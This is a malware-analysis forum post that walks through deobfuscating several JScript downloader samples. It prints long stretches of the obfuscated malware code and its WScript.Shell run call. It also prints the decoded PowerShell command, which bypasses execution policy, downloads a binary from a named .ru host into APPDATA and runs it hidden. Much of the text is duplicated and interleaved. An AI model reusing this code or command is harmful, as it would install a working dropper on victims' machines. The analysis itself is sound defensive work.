https://malwaretips.com/threads/18-11-16-10.65618/
Thanks to @silversurfer
Edited :
Why this sample ?
Similar to some sample deobfuscations I made very quickly (less than 20s).
Each time, they seem to take my remarks into account and improve some parts.
1) What it looks like :
Look at the spoiler : in red, the most important parts (almost all the other parts are not very important, or completely useless).
Remember the method used against this family :
(1) find the real command line
- One long obfuscated string that is the command line of the run part
- One array of strings : the patterns to be replaced in the long string
- One array of chars : the chars that will replace those patterns in the long string
(2) find, among the numerous useless lines, the single line that matters :
2) From previous version :
It didn't change a lot from other previous samples I have analysed.
2-1) The first time :
3) The current sample :
(1) A search on run => no result ...
=> it seems they have used in this sample another trick to defeat my easy method (searching for the word "run")
(2) Let's search for the big function that should return the command line, the value passed as a parameter to the run method
We have found the famous function that returns the real command line.
=> method : a quick look at the file content :
This time : they used an array of strings that is joined to make a string
We have got the name of the function : bufosmy
A search on this name :
Let's verify :
A search on ewubq :
Let's understand how this function deobfuscates the command line
function bufosmy() {
return ocolr;
=> here, the end of the loop :
}
4) Conclusion :
Small modifications that don't really make it harder to extract all the malware parts.
run powershell.exe :
BILL-24436.js
7.js
Thanks to @silversurfer
Edited :
Added samples and differences from EURO_27507.js :
https://malwaretips.com/threads/sim...4436-js-7-js-updated.65637/page-2#post-570623
BILL-24436.js (see the link at the end)
https://malwaretips.com/threads/sim...bill-24436-js-7-js-updated.65637/#post-568227
7.js
https://malwaretips.com/threads/sim...bill-24436-js-7-js-updated.65637/#post-568227
https://malwaretips.com/threads/sim...4436-js-7-js-updated.65637/page-2#post-570623
EURO_27507.js - 6/54
Why this sample ?
Similar to some sample deobfuscations I made very quickly (less than 20s).
Each time, they seem to take my remarks into account and improve some parts.
1) What it looks like :
Look at the spoiler : in red, the most important parts (almost all the other parts are not very important, or completely useless).
var uhetu = '92278';
vidrimkyzt = 'wafe';
function iswer() {
vahuc = 'bicq';
function ofilxum() {
var wawpugw = typeof document4;
var yffapyffa = undefined;
function omide() {
var tesuxcarre = 'ygqony';
var agjobxex = "replace";
var xahlyrw = "38465";
function muwnyrx() {
var vqelle = '58690';
var erazyf = "gi";
function cileg() {
function ymajdeluc() {
function ikiredhu() {
var sumwyzu = 0;
var isevz = undefined;
var zawur = 1;
function nyjovyns() {
var lvoje = 18.4517;
var axirkuw = 'zyktiz';
var lwabgyguw = undefined;
var jobqedv = 0;
var rukaby = undefined;
var ujiwja = null;
function bufosmy() {
var ewubq = bufosmy();
if (lwabgyguw == 0) {
vidrimkyzt = 'wafe';
function iswer() {
var ohamho = 0;
return ohamho;
}return ohamho;
vahuc = 'bicq';
function ofilxum() {
var egassodca = 1;
return egassodca;
}return egassodca;
var wawpugw = typeof document4;
var yffapyffa = undefined;
function omide() {
Object["prototype"]["length"] = 80;
var mylal = ["dleba", "re", "wonzijb"][1];
var eclyv = ["onxexke", "tu", "dudgeh"][1];
var zqyttih = ["nexi", "rn", "vmesmiwxi"][1];
var tedilbu = ["yvpokajv", " n", "zqigto"][1];
var unfafi = ["erqahl", "ew", "akugzo"][1];
var nmanlynxa = ["jkybky", " O", "hzovfir"][1];
var ewavdu = ["vyvgub", "bj", "cigxapf"][1];
var dehzi = ["ebyt", "ec", "ehhin"][1];
var immiqq = ["vcuctyp", "t(", "fwazpu"][1];
var slacu = ["papapko", ").", "bypykdy"][1];
var dewy = ["olak", "le", "ntaqmakmo"][1];
var opumq = ["kati", "ng", "mibbyni"][1];
var orakwa = ["gjadi", "th", "wdidjasr"][1];
var ujmyqym = ["iqzav", " =", "eqpyhon"][1];
var xpanfarn = ["iqedo", "= ", "gywa"][1];
var ugjuwzuqh = ["jnaqqyse", "80", "aziso"][1];
var kizawb = ["oxex", " &", "wyjumn"][1];
var rixjo = ["olgala", "& ", "kvufqa"][1];
var igcazji = ["cygekp", "ty", "ydmoqjy"][1];
var cybheve = ["sbeqyn", "pe", "chogoj"][1];
var enlaso = ["inikv", "of", "hywgy"][1];
var duvexr = ["vwyhodx", " W", "edazna"][1];
var pmaku = ["stocefde", "Sc", "okfuhzo"][1];
var hycu = ["dgokin", "ri", "uveqa"][1];
var vcuzevo = ["ubykebj", "pt", "atunejk"][1];
var ipelqiql = ["ucbuf", ".S", "yrezokx"][1];
var qidxixle = ["evlojums", "td", "ozofa"][1];
var jegsaf = ["viferx", "In", "kukyt"][1];
var ahekmakb = ["vamxal", ".W", "xusparj"][1];
var qnipdu = ["kluqdanx", "ri", "odmoqa"][1];
var ogfuv = ["cossuho", "te", "entakga"][1];
var vciwdug = ["zmedu", "Li", "efipo"][1];
var obpemk = ["vhosrals", "ne", "mdysa"][1];
var ywej = ["fnakvir", " =", "yzixleq"][1];
var mdyrrogr = ["wbefdan", "= ", "ydpomam"][1];
var luceqca = ["xuliki", "'u", "rivyrd"][1];
var oqirn = ["ufcapnam", "nk", "fryja"][1];
var sjabpoh = ["javfa", "no", "amun"][1];
var ytqakc = ["qabkagj", "wn", "dvabpu"][1];
var ocolr = ["akdygv", "'", "nfagyvu"][1];
return new Function(mylal + eclyv + zqyttih + tedilbu + unfafi + nmanlynxa + ewavdu + dehzi + immiqq + slacu + dewy + opumq + orakwa + ujmyqym + xpanfarn + ugjuwzuqh + kizawb + rixjo + igcazji + cybheve + enlaso + duvexr + pmaku + hycu + vcuzevo + ipelqiql + qidxixle + jegsaf + ahekmakb + qnipdu + ogfuv + vciwdug + obpemk + ywej + mdyrrogr + luceqca + oqirn + sjabpoh + ytqakc + ocolr)();
}var mylal = ["dleba", "re", "wonzijb"][1];
var eclyv = ["onxexke", "tu", "dudgeh"][1];
var zqyttih = ["nexi", "rn", "vmesmiwxi"][1];
var tedilbu = ["yvpokajv", " n", "zqigto"][1];
var unfafi = ["erqahl", "ew", "akugzo"][1];
var nmanlynxa = ["jkybky", " O", "hzovfir"][1];
var ewavdu = ["vyvgub", "bj", "cigxapf"][1];
var dehzi = ["ebyt", "ec", "ehhin"][1];
var immiqq = ["vcuctyp", "t(", "fwazpu"][1];
var slacu = ["papapko", ").", "bypykdy"][1];
var dewy = ["olak", "le", "ntaqmakmo"][1];
var opumq = ["kati", "ng", "mibbyni"][1];
var orakwa = ["gjadi", "th", "wdidjasr"][1];
var ujmyqym = ["iqzav", " =", "eqpyhon"][1];
var xpanfarn = ["iqedo", "= ", "gywa"][1];
var ugjuwzuqh = ["jnaqqyse", "80", "aziso"][1];
var kizawb = ["oxex", " &", "wyjumn"][1];
var rixjo = ["olgala", "& ", "kvufqa"][1];
var igcazji = ["cygekp", "ty", "ydmoqjy"][1];
var cybheve = ["sbeqyn", "pe", "chogoj"][1];
var enlaso = ["inikv", "of", "hywgy"][1];
var duvexr = ["vwyhodx", " W", "edazna"][1];
var pmaku = ["stocefde", "Sc", "okfuhzo"][1];
var hycu = ["dgokin", "ri", "uveqa"][1];
var vcuzevo = ["ubykebj", "pt", "atunejk"][1];
var ipelqiql = ["ucbuf", ".S", "yrezokx"][1];
var qidxixle = ["evlojums", "td", "ozofa"][1];
var jegsaf = ["viferx", "In", "kukyt"][1];
var ahekmakb = ["vamxal", ".W", "xusparj"][1];
var qnipdu = ["kluqdanx", "ri", "odmoqa"][1];
var ogfuv = ["cossuho", "te", "entakga"][1];
var vciwdug = ["zmedu", "Li", "efipo"][1];
var obpemk = ["vhosrals", "ne", "mdysa"][1];
var ywej = ["fnakvir", " =", "yzixleq"][1];
var mdyrrogr = ["wbefdan", "= ", "ydpomam"][1];
var luceqca = ["xuliki", "'u", "rivyrd"][1];
var oqirn = ["ufcapnam", "nk", "fryja"][1];
var sjabpoh = ["javfa", "no", "amun"][1];
var ytqakc = ["qabkagj", "wn", "dvabpu"][1];
var ocolr = ["akdygv", "'", "nfagyvu"][1];
return new Function(mylal + eclyv + zqyttih + tedilbu + unfafi + nmanlynxa + ewavdu + dehzi + immiqq + slacu + dewy + opumq + orakwa + ujmyqym + xpanfarn + ugjuwzuqh + kizawb + rixjo + igcazji + cybheve + enlaso + duvexr + pmaku + hycu + vcuzevo + ipelqiql + qidxixle + jegsaf + ahekmakb + qnipdu + ogfuv + vciwdug + obpemk + ywej + mdyrrogr + luceqca + oqirn + sjabpoh + ytqakc + ocolr)();
var tesuxcarre = 'ygqony';
var agjobxex = "replace";
var xahlyrw = "38465";
function muwnyrx() {
var tojwolax = 1;
return tojwolax;
}return tojwolax;
var vqelle = '58690';
var erazyf = "gi";
function cileg() {
var ijahapso = false;
return ijahapso;
}return ijahapso;
function ymajdeluc() {
var ycdung = null;
return ycdung;
}return ycdung;
function ikiredhu() {
return 1;
}var sumwyzu = 0;
var isevz = undefined;
var zawur = 1;
function nyjovyns() {
var apdopi = null;
return apdopi;
}return apdopi;
var lvoje = 18.4517;
var axirkuw = 'zyktiz';
var lwabgyguw = undefined;
var jobqedv = 0;
var rukaby = undefined;
var ujiwja = null;
function bufosmy() {
var ocolr = ["syby", "oty", "myxrwowme", "x", "vyl", "yvyl", "usq", "wowme", "Xwowme", "nlunoty", "o", "majs", "syby", "nlunoty", "o", "powwowme", "vyl", "wowme", "", "uvyl", "vsaqq", "vyl", "saqq", "", "wowme", "Rxyfn", "qqwowme", "gi", "wowme", "uvyl", "vsaqq", "vyl", "saqq", "", "luvyl", "vsaqq", "vyl", "saqq", "", "Luvyl", "vsaqq", "vyl", "saqq", "", "yvyl", "usq", "uvyl", "vsaqq", "vyl", "saqq", "", "wowme", "Xuvyl", "vsaqq", "vyl", "saqq", "", "wowme", "uvyl", "vsaqq", "vyl", "saqq", "", "nlunoty", "o", "cag", "wowme", "xuvyl", "vsaqq", "vyl", "saqq", "", "wowme", "uvyl", "vsaqq", "vyl", "saqq", "", "syby", "uvyl", "vsaqq", "vyl", "saqq", "", "uuvyl", "vsaqq", "vyl", "saqq", "", "oty", "uvyl", "vsaqq", "vyl", "saqq", "", "ioNuvyl", "vsaqq", "vyl", "saqq", "", "Puvyl", "vsaqq", "vyl", "saqq", "", "olisyby", "Ynlunoty", "o", "nlunoty", "o", "nlunoty", "o", "nlunoty", "o", "nlunoty", "o", "uvyl", "vsaqq", "vyl", "saqq", "", "BYPsaqq", "xyfn", "xyfn", "nlunoty", "o", "nlunoty", "o", "nlunoty", "o", "nlunoty", "o", "nlunoty", "o", "cag", "uvyl", "vsaqq", "vyl", "saqq", "", "nopruvyl", "vsaqq", "vyl", "saqq", "", "OFiLuvyl", "vsaqq", "vyl", "saqq", "", "wowme", "uvyl", "vsaqq", "vyl", "saqq", "", "nlunoty", "o", "nlunoty", "o", "cag", "wwowme", "vyl", "wowme", "", "uvyl", "vsaqq", "vyl", "saqq", "", "Iuvyl", "vsaqq", "vyl", "saqq", "", "Nuvyl", "vsaqq", "vyl", "saqq", "", "vyl", "uvyl", "vsaqq", "vyl", "saqq", "", "ouvyl", "vsaqq", "vyl", "saqq", "", "wwowme", "vyl", "wowme", "", "xyfn", "oty", "yuvyl", "vsaqq", "vyl", "saqq", "", "luvyl", "vsaqq", "vyl", "saqq", "", "wowme", "uvyl", "vsaqq", "vyl", "saqq", "", "nlunoty", "o", "qqwowme", "gi", "ivyl", "uvyl", "vsaqq", "vyl", "saqq", "", "vyl", "uvyl", "vsaqq", "vyl", "saqq", "", "wowme", "nuvyl", "vsaqq", "vyl", "saqq", "", "nlunoty", "o", "nlunoty", "o", "nlunoty", "o", "nlunoty", "o", "uzalu", "nwowme", "wwowme", "vyl", "wowme", "", "uvyl", "vsaqq", "vyl", "saqq", "", "cag", "uvyl", "vsaqq", "vyl", "saqq", "", 
"Obuvyl", "vsaqq", "vyl", "saqq", "", "jwowme", "syby", "uvyl", "vsaqq", "vyl", "saqq", "", "oty", "nlunoty", "o", "uvyl", "vsaqq", "vyl", "saqq", "", "xyfn", "Yxyfn", "oty", "wowme", "oty", "myxrwowme", "x", "yvyl", "usq", "uvyl", "vsaqq", "vyl", "saqq", "", "Nwowme", "oty", "uvyl", "vsaqq", "vyl", "saqq", "", "yvyl", "usq", "wwowme", "vyl", "wowme", "", "wowme", "bsyby", "luvyl", "vsaqq", "vyl", "saqq", "", "iuvyl", "vsaqq", "vyl", "saqq", "", "wowme", "Nuvyl", "vsaqq", "vyl", "saqq", "", "oty", "fwwowme", "vyl", "wowme", "", "saqq", "s", "yvyl", "usq", "vyl", "uvyl", "vsaqq", "vyl", "saqq", "", "Owwowme", "vyl", "wowme", "", "Nuvyl", "vsaqq", "vyl", "saqq", "", "LOuvyl", "vsaqq", "vyl", "saqq", "", "saqq", "vyl", "uvyl", "vsaqq", "vyl", "saqq", "", "fIuvyl", "vsaqq", "vyl", "saqq", "", "lwowme", "uzalu", "oqby", "qqwowme", "gi", "oty", "oty", "pwowme", "tpyvi", "majs", "majs", "wwowme", "vyl", "wowme", "", "wwowme", "vyl", "wowme", "", "wwowme", "vyl", "wowme", "", "yvyl", "usq", "browwowme", "vyl", "wowme", "", "nsaqq", "lwowme", "oty", "yvyl", "usq", "oty", "opmajs", "ivyl", "yvyl", "usq", "pqqwowme", "gi", "p?f=1yvyl", "usq", "vyl", "saqq", "oty", "oqby", "", "uvyl", "vsaqq", "vyl", "saqq", "", "oqby", "hkyz", "saqq", "ppvyl", "saqq", "oty", "saqq", "hkyz", "yvyl", "usq", "wowme", "xwowme", "oqby", "fwwowme", "vyl", "wowme", "", "saqq", "s", "iwwowme", "vyl", "wowme", "", "oty", "wowme", "jli", "xyfn", "oty", "saqq", "Roty", "cag", "puvyl", "vsaqq", "vyl", "saqq", "", "rOuvyl", "vsaqq", "vyl", "saqq", "", "syby", "uvyl", "vsaqq", "vyl", "saqq", "", "wowme", "xyfn", "xyfn", "uvyl", "vsaqq", "vyl", "saqq", "", "nlunoty", "o", "uvyl", "vsaqq", "vyl", "saqq", "", "hkyz", "saqq", "Ppvyl", "saqq", "oty", "saqq", "hkyz", "yvyl", "usq", "wowme", "xwowme", ""].join(",");
var nedxes = ['wowme,', "oqby,", 'majs,', 'cag,', "atco,", "vyl,", 'ydusq,', 'etpyvi,', 'wede,', 'syby,', "hkyz,", "oty,", "tmyxrex,", "uzalu,", "qqegi,", 'saqq,', 'nlunto,', "udvada,", "fwas,", "xyfn,", 'iwtejli,'];
var ezujigz = ['e', "'", '/', "-", "\,", 'd', ".", ':', "w", 'c', '%', "t", "m", "(", 'h', "a", ' ', '^', ")", 's', ";"];
var pfixyg = false;
while (1) {
return ocolr;
}var nedxes = ['wowme,', "oqby,", 'majs,', 'cag,', "atco,", "vyl,", 'ydusq,', 'etpyvi,', 'wede,', 'syby,', "hkyz,", "oty,", "tmyxrex,", "uzalu,", "qqegi,", 'saqq,', 'nlunto,', "udvada,", "fwas,", "xyfn,", 'iwtejli,'];
var ezujigz = ['e', "'", '/', "-", "\,", 'd', ".", ':', "w", 'c', '%', "t", "m", "(", 'h', "a", ' ', '^', ")", 's', ";"];
var pfixyg = false;
while (1) {
if (!pfixyg) pfixyg = 0;
if (pfixyg == nedxes.length) break;
var ugula = nedxes[pfixyg];
switch (omide()) {
case true:
pfixyg++;
}if (pfixyg == nedxes.length) break;
var ugula = nedxes[pfixyg];
switch (omide()) {
case true:
var ovhugca = new RegExp(ugula, erazyf);
ocolr = ocolr[agjobxex](ovhugca, ezujigz[pfixyg]);
break;
}ocolr = ocolr[agjobxex](ovhugca, ezujigz[pfixyg]);
break;
pfixyg++;
return ocolr;
var ewubq = bufosmy();
if (lwabgyguw == 0) {
if (yffapyffa == 'nyja') {
if (ymajdeluc() == 'rfuknaj') {
} else {var ulxyl = 'egojubv';
if (ulxyl === 0) {
}if (ulxyl === 0) {
if (typeof vqelle == "string") {
}var ysxamhysyks = 6;
var zwupmubhy = "81657";
var jqodliri = null;
var vjyzkejijf = 0;
}var zwupmubhy = "81657";
var jqodliri = null;
var vjyzkejijf = 0;
if (ymajdeluc() == 'rfuknaj') {
if (typeof muwnyrx() == "number") {
}var rygetqy = undefined;
var obeske = '97649';
var gzavusu = 31.7;
var ubacqud = obeske + gzavusu;
ubacqud = '41348' + ubacqud;
var ipifiwqa = undefined;
var iwujsiwnuq = undefined;
var unuro = "ysmyzavihj";
var igtohixy = 62;
var umlilpabijd = uhetu + igtohixy;
umlilpabijd = 16.286 + umlilpabijd;
var rhememqegza = 55.4;
var ocjulfag = vahuc + rhememqegza;
ocjulfag = 139.21 + ocjulfag;
}var obeske = '97649';
var gzavusu = 31.7;
var ubacqud = obeske + gzavusu;
ubacqud = '41348' + ubacqud;
var ipifiwqa = undefined;
var iwujsiwnuq = undefined;
var unuro = "ysmyzavihj";
var igtohixy = 62;
var umlilpabijd = uhetu + igtohixy;
umlilpabijd = 16.286 + umlilpabijd;
var rhememqegza = 55.4;
var ocjulfag = vahuc + rhememqegza;
ocjulfag = 139.21 + ocjulfag;
var ciryrowi = 1;
var bbywuzhugw = 12;
var yjerupr = undefined;
switch (ujiwja) {
case '96146':
}var bbywuzhugw = 12;
var yjerupr = undefined;
switch (ujiwja) {
case '96146':
var tobykzagmi = true;
if (tobykzagmi == false) {
if (iswer() === undefined) { //0
break;
case undefined:if (tobykzagmi == false) {
if (ikiredhu() === null) {
}var icamge = 'qlisalyx';
if (icamge === 'ibnymm') {
}if (icamge === 'ibnymm') {
var jahuccy = 40.8286;
var mpawnom = axirkuw + jahuccy;
mpawnom = 8.8434 + mpawnom;
var yhgitza = false;
}var mpawnom = axirkuw + jahuccy;
mpawnom = 8.8434 + mpawnom;
var yhgitza = false;
if (iswer() === undefined) { //0
odsaxuto = 0.6244;
var qycxakz = vidrimkyzt + odsaxuto;
qycxakz = qycxakz + "89577";
var olokteslijd = false;
}var qycxakz = vidrimkyzt + odsaxuto;
qycxakz = qycxakz + "89577";
var olokteslijd = false;
break;
var tobykzagmi = true;
if (tobykzagmi == false) {
if (iswer() === undefined) {
break;
case null:if (tobykzagmi == false) {
if (ikiredhu() === null) {
}var icamge = 'qlisalyx';
if (icamge === 'ibnymm') {
}if (icamge === 'ibnymm') {
var jahuccy = 40.8286;
var mpawnom = axirkuw + jahuccy;
mpawnom = 8.8434 + mpawnom;
var yhgitza = false;
}var mpawnom = axirkuw + jahuccy;
mpawnom = 8.8434 + mpawnom;
var yhgitza = false;
if (iswer() === undefined) {
odsaxuto = 0.6244;
var qycxakz = vidrimkyzt + odsaxuto;
qycxakz = qycxakz + "89577";
var olokteslijd = false;
}var qycxakz = vidrimkyzt + odsaxuto;
qycxakz = qycxakz + "89577";
var olokteslijd = false;
break;
var guhhepxe = WScript.CreateObject("WScript.Shell");
if (jobqedv === 0) {
if (jobqedv === 0) {
var thucxiw = undefined;
var ycukqajz = false;
var vxoqbexpuhe = null;
var dedsogkybqo = 14.1;
var uficow = dedsogkybqo + tesuxcarre;
uficow = uficow + 5;
var itmemgov = 595;
itmemgov = 57 + itmemgov;
var obhyvtuv = 105.44;
var mnaqkyh = 14.472;
if (wawpugw == "undefined") {
} else {
if (aqobzuhni === "akremygxa") {
}
break;
case "igumy":var ycukqajz = false;
var vxoqbexpuhe = null;
var dedsogkybqo = 14.1;
var uficow = dedsogkybqo + tesuxcarre;
uficow = uficow + 5;
var itmemgov = 595;
itmemgov = 57 + itmemgov;
var obhyvtuv = 105.44;
var mnaqkyh = 14.472;
if (wawpugw == "undefined") {
var upawkarkez = true;
switch (upawkarkez) {
case undefined:
var ylzuvwase = null;
var wloreny = 'tavoxir';
var eqvabwemov = "mixejcesu";
var fkipele = 19;
fkipele = '32901';
switch (upawkarkez) {
case undefined:
if (ofilxum() === undefined) {
break;
case 'ilqoqigm':var dzabosevju = 10.4;
var gizotz = '24306';
}var gizotz = '24306';
break;
if (ofilxum() === undefined) {
break;
case null:var dzabosevju = 10.4;
var gizotz = '24306';
}var gizotz = '24306';
break;
if (ofilxum() === undefined) {
var dzabosevju = 10.4;
var gizotz = '24306';
}
break;
case true:var dzabosevju = 10.4;
var gizotz = '24306';
}
break;
guhhepxe["r" + "un"](ewubq, sumwyzu);
break;
case false:break;
if (ofilxum() === undefined) {
break;
}var dzabosevju = 10.4;
var gizotz = '24306';
}var gizotz = '24306';
break;
var ylzuvwase = null;
var wloreny = 'tavoxir';
var eqvabwemov = "mixejcesu";
var fkipele = 19;
fkipele = '32901';
if (lvoje == 18.4517) {
var aqobzuhni = null;if (nyjovyns() === null) {
}var ixiqxamav = "wigabki";
var alxydxuhel = 97;
alxydxuhel = 'hfuhyfc';
var cusyji = undefined;
}var alxydxuhel = 97;
alxydxuhel = 'hfuhyfc';
var cusyji = undefined;
if (aqobzuhni === "akremygxa") {
kosaqoj = "peqfelef";
qkoqvefle = 64;
var ercotutxi = kosaqoj + qkoqvefle;
ercotutxi = '22' + ercotutxi;
var ijxoripvepz = null;
var rkusjazgeb = "8103";
var evginocobh = 11;
var vpuwxefne = evginocobh + rkusjazgeb;
vpuwxefne = vpuwxefne + "89355";
var qpimqivt = 0;
var yzugqeb = 'alazutbuck';
var fvekypvyqlu = 52;
var cehpedikq = null;
}
var mulmyso = undefined;
if (mulmyso === undefined) {
}
}qkoqvefle = 64;
var ercotutxi = kosaqoj + qkoqvefle;
ercotutxi = '22' + ercotutxi;
var ijxoripvepz = null;
var rkusjazgeb = "8103";
var evginocobh = 11;
var vpuwxefne = evginocobh + rkusjazgeb;
vpuwxefne = vpuwxefne + "89355";
var qpimqivt = 0;
var yzugqeb = 'alazutbuck';
var fvekypvyqlu = 52;
var cehpedikq = null;
}
var mulmyso = undefined;
if (mulmyso === undefined) {
var upitov = "udy";
var hamoxife = 20.7;
hamoxife = 1 + hamoxife;
var hamoxife = 20.7;
hamoxife = 1 + hamoxife;
break;
var tobykzagmi = true;
if (tobykzagmi == false) {
if (iswer() === undefined) {
odsaxuto = 0.6244;
var qycxakz = vidrimkyzt + odsaxuto;
qycxakz = qycxakz + "89577";
var olokteslijd = false;
}
break;
case 'zqecmalqe':if (tobykzagmi == false) {
if (ikiredhu() === null) {
}var icamge = 'qlisalyx';
if (icamge === 'ibnymm') {
}if (icamge === 'ibnymm') {
var jahuccy = 40.8286;
var mpawnom = axirkuw + jahuccy;
mpawnom = 8.8434 + mpawnom;
var yhgitza = false;
}var mpawnom = axirkuw + jahuccy;
mpawnom = 8.8434 + mpawnom;
var yhgitza = false;
if (iswer() === undefined) {
odsaxuto = 0.6244;
var qycxakz = vidrimkyzt + odsaxuto;
qycxakz = qycxakz + "89577";
var olokteslijd = false;
}
break;
var tobykzagmi = true;
if (tobykzagmi == false) {
if (iswer() === undefined) {
odsaxuto = 0.6244;
var qycxakz = vidrimkyzt + odsaxuto;
qycxakz = qycxakz + "89577";
var olokteslijd = false;
}
break;
}
if (ikiredhu() === null) {
var icamge = 'qlisalyx';
}var icamge = 'qlisalyx';
if (icamge === 'ibnymm') {
}var jahuccy = 40.8286;
var mpawnom = axirkuw + jahuccy;
mpawnom = 8.8434 + mpawnom;
var yhgitza = false;
}var mpawnom = axirkuw + jahuccy;
mpawnom = 8.8434 + mpawnom;
var yhgitza = false;
if (iswer() === undefined) {
odsaxuto = 0.6244;
var qycxakz = vidrimkyzt + odsaxuto;
qycxakz = qycxakz + "89577";
var olokteslijd = false;
}
break;
}
Remember the method used against this family :
(1) find the real command line
- One long obfuscated string that is the command line of the run part
- One array of strings : the patterns to be replaced in the long string
- One array of chars : the chars that will replace those patterns in the long string
(2) find, among the numerous useless lines, the single line that matters :
Shell.run(commandline, 0)
=> on the script this line is obfuscated :
=> on the script this line is obfuscated :
But : there are methods to find it, which I have shown on previous samples; each time, though, the new sample is modified so that my method fails.
2) From previous version :
It didn't change a lot from other previous samples I have analysed.
2-1) The first time :
Quick search for the word run :
We found :
2-2) 2nd old sample :
We found :
case undefined:
togultyku.run(yvedy(), fqopwytlu);
break;=> Shell.run(commmandline, 0)
=> fqopwytlu : 0 (found by searching the file content for the var fqopwytlu)
=> yvedy() : a function that returns the deobfuscated command line (see the spoiler part)
=> fqopwytlu : 0 (found by searching the file content for the var fqopwytlu)
=> yvedy() : a function that returns the deobfuscated command line (see the spoiler part)
function yvedy() {
This function returns ekihvub, a value computed from jaqinod, a string with "strange" content
var ekihvub = jaqinod[hifenmuhz](tyfjepfef, nlany)[hifenmuhz](odacik, axucw)[hifenmuhz](hyqzuski, ujcilf)[hifenmuhz](jzehykli, ymidv);
This is some string manipulation.
From the var names and the content of the script, the real values are easy to retrieve :
hifenmuhz = 'replace';
var tyfjepfef = /ujixxu/gi;
var nlany = '^';
var odacik = /ejewca/gi;
var axucw = 'c';
var hyqzuski = /exozett/gi;
var ujcilf = 'e';
var jzehykli = /sipxuqm/gi;
var ymidv = 'a';
var etuqmowuh = undefined;
var ekihvub = jaqinod['replace'](/ujixxu/gi, '^')['replace'](/ejewca/gi, 'c')['replace'](/exozett/gi, 'e')['replace'](/sipxuqm/gi, 'a');
So, multiple "replace" calls are used to clean the famous obfuscated string in jaqinod
Result :
var jaqinod = "ejewcamd.exozettxexozett /ejewca poujixxuWujixxuexozettujixxuRshexozettLujixxuL.exozettXexozett ujixxu-ujixxuexozettxexozettejewcaujixxuutIoujixxunPoujixxuLIejewcaY ujixxubypsipxuqmujixxusujixxuS -ujixxunujixxuoPrujixxuoFiujixxuLexozett -WinujixxudOWsujixxutujixxuYujixxulexozett hujixxuiujixxuDDujixxuexozettNujixxu ujixxu(nexozettW-oBJexozettujixxuejewcaujixxutujixxu ujixxuSysujixxutexozettujixxuMujixxu.nexozettujixxuTujixxu.ujixxuWexozettujixxubujixxuejewcaLIexozettNTujixxu)ujixxu.doWNujixxulOujixxusipxuqmujixxudFujixxuIujixxulujixxuexozett('http://lovexozett.nexozettwsexozett...ixxurujixxuoujixxuejewcaexozettSujixxuSujixxu ujixxu%sipxuqmpPdsipxuqmtsipxuqm%.exozettXexozett";
var ekihvub = jaqinod[hifenmuhz](tyfjepfef, nlany)[hifenmuhz](odacik, axucw)[hifenmuhz](hyqzuski, ujcilf)[hifenmuhz](jzehykli, ymidv);
return ekihvub;
}var ekihvub = jaqinod[hifenmuhz](tyfjepfef, nlany)[hifenmuhz](odacik, axucw)[hifenmuhz](hyqzuski, ujcilf)[hifenmuhz](jzehykli, ymidv);
return ekihvub;
This function returns ekihvub, a value computed from jaqinod, a string with "strange" content
var ekihvub = jaqinod[hifenmuhz](tyfjepfef, nlany)[hifenmuhz](odacik, axucw)[hifenmuhz](hyqzuski, ujcilf)[hifenmuhz](jzehykli, ymidv);
This is some string manipulation.
From the var names and the content of the script, the real values are easy to retrieve :
hifenmuhz = 'replace';
var tyfjepfef = /ujixxu/gi;
var nlany = '^';
var odacik = /ejewca/gi;
var axucw = 'c';
var hyqzuski = /exozett/gi;
var ujcilf = 'e';
var jzehykli = /sipxuqm/gi;
var ymidv = 'a';
var etuqmowuh = undefined;
var ekihvub = jaqinod['replace'](/ujixxu/gi, '^')['replace'](/ejewca/gi, 'c')['replace'](/exozett/gi, 'e')['replace'](/sipxuqm/gi, 'a');
So, multiple "replace" calls are used to clean the famous obfuscated string in jaqinod
Result :
"cmd.exe /c po^W^e^RsheL^L.eXe ^-^exec^utIo^nPo^LIcY ^bypa^s^S -^n^oPr^oFi^Le -Win^dOWs^t^Y^le h^i^DD^eN^ ^(neW-oBJe^c^t^ ^Sys^te^M^.ne^T^.^We^b^cLIeNT^).doWNlOadFIle('http ://love.newsexgirls.ru/js/boxun4.bin','%APPDATA%\exe');STaRt-ProceSS %APPDATA%\eXe ""
it's easy to understand :
"cmd.exe /cpoWeRsheLL.eXe -executIonPoLIcY bypasS -noProFiLe -WindOWstYle hiDDeN (neW-oBJect SysteM.neT.WebcLIeNT).doWNlOadFIle('http ://love.newsexgirls.ru/js/boxun4.bin','%APPDATA%\exe');STaRt-ProceSS %APPDATA%\eXe "
Quick search for run
We found :
=> this time, the obfuscated Shell.run(commandline,0) part is not found directly !
=> they put the word "run" in a var, so that the important part cannot be found directly.
We found :
=> this time, the obfuscated Shell.run(commandline,0) part is not found directly !
=> they put the word "run" in a var, so that the important part cannot be found directly.
=> var cimy = 'run'
but a search on cimy does the job :
case null:
ittirra[cimy](xpoqys, xvafdyv);
break;=> xvafdyv = 0;
=> Shell.run(xpoqys, 0);
xpoqys : a var that hides a function call retrieving the deobfuscated command line
A search gives :
var xpoqys = mhuxezyd();
=> mhuxezyd() is the function that returns the deobfuscated command line string
=> Shell.run(xpoqys, 0);
xpoqys : a var that hides a function call retrieving the deobfuscated command line
A search gives :
var xpoqys = mhuxezyd();
=> mhuxezyd() is the function that returns the deobfuscated command line string
function mhuxezyd() {
Explanation :
two arrays are used for the replace part :
